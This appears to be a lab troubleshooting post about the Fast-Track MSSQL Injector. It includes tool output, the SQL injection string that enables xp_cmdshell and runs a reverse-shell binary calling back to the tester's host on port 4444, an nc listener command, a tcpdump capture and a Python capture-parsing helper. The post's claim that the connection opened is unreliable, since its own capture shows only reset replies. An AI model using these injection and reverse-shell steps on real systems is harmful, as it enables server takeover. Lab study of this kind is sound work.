MSSQL2K - SQL Injector - Query String Parameter Attack

The steps were as follows:

root@root:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Requirements: PExpect
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module uses a reverse shell by using the binary2hex method for uploading.
    It does not require FTP or any other service, instead we are using the debug
    function in Windows to generate the executable.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

    <ctrl>-c to exit to Main Menu...

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated.  Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload (1/4)....
    Sending second portion of payload (2/4)....
    Sending third portion of payload (3/4)...
    Sending the last portion of the payload (4/4)...
    Running cleanup before executing the payload...
    Running the payload on the server...
     You should have a shell if everything went good..Might take a couple seconds

Then nothing more happened: no shell was obtained.

So I looked at the code in fasttrack/bin/ftsrc/sqlbinarypayload.py and saw:

string26=(r"';exec master..xp_cmdshell 'reverse.exe %s 4444'--" % (ipaddr))

And the input in my Eclipse looked like this:

select username, password, phone from tb_user where username='';exec master..xp_cmdshell 'reverse.exe 192.168.1.11 4444'--' and password='null'

Capturing packets with wireshark and tcpdump:

[Figure 1: packet capture screenshot]

The tcpdump output was as follows:

root@root:/pentest/exploits/fasttrack# tcpdump port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
19:54:33.188133 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.188160 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1697364906, win 0, length 0
19:54:33.633652 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.633679 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:54:34.180136 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:34.180159 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:27.385923 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.385983 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 4267102229, win 0, length 0
19:57:27.867489 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.867577 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:28.414365 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:28.414434 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0

This shows that the TCP connection was opened, but no shell was opened. Looking again at the code in fasttrack/bin/menu/sqlinjector.py:

   if menu == '1':
      try:
         reload(sqlbinarypayload)
      except Exception:
         pass
      import sqlbinarypayload

After that, there seems to be no code that handles the established TCP connection. So no shell was obtained.
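The tcpdump output above can be checked mechanically. The following is an added example, not Fast-Track's code: it parses the capture lines and reports, per connection attempt, whether the target port answered the client's SYN with SYN/ACK (a listener accepted the handshake) or with RST (nothing was listening on that port at that moment), which is the first thing to verify when a reverse connection arrives but no shell appears.

```python
import re
from collections import OrderedDict

# Constructed from the tcpdump capture shown above (trimmed); not Fast-Track code.
CAPTURE = """\
19:54:33.188133 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.188160 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1697364906, win 0, length 0
19:54:33.633652 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.633679 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:27.385923 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.385983 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 4267102229, win 0, length 0
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): Flags \[(?P<flags>[^\]]*)\]")


def split_endpoint(endpoint):
    """'192.168.1.11.4444' -> ('192.168.1.11', 4444); tcpdump appends the port with a dot."""
    host, port = endpoint.rsplit(".", 1)
    return host, int(port)


def classify_attempts(capture):
    """Map each client SYN (client, cport, server, sport) to a verdict:
    'refused'  - server answered with RST (nothing listening on that port)
    'open'     - server answered with SYN/ACK (a listener accepted the handshake)
    'no-reply' - SYN never answered in the capture (dropped or filtered)"""
    attempts = OrderedDict()
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst, flags = split_endpoint(m["src"]), split_endpoint(m["dst"]), m["flags"]
        if flags == "S":
            # Bare SYN from the client; setdefault keeps an earlier verdict on a retransmit.
            attempts.setdefault(src + dst, "no-reply")
            continue
        key = dst + src  # a reply travels server -> client, so flip the tuple
        if key not in attempts:
            continue
        if "R" in flags:
            attempts[key] = "refused"
        elif "S" in flags and "." in flags:
            attempts[key] = "open"
    return attempts


def listener_missing(capture, port):
    """True when every handshake attempt towards `port` was refused."""
    verdicts = [v for (_, _, _, sport), v in classify_attempts(capture).items() if sport == port]
    return bool(verdicts) and all(v == "refused" for v in verdicts)
```

Run against the capture above, every attempt to port 4444 is classified as refused, so the check points at the listener side (the popen2-launched xterm/nc) rather than at the injected payload.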

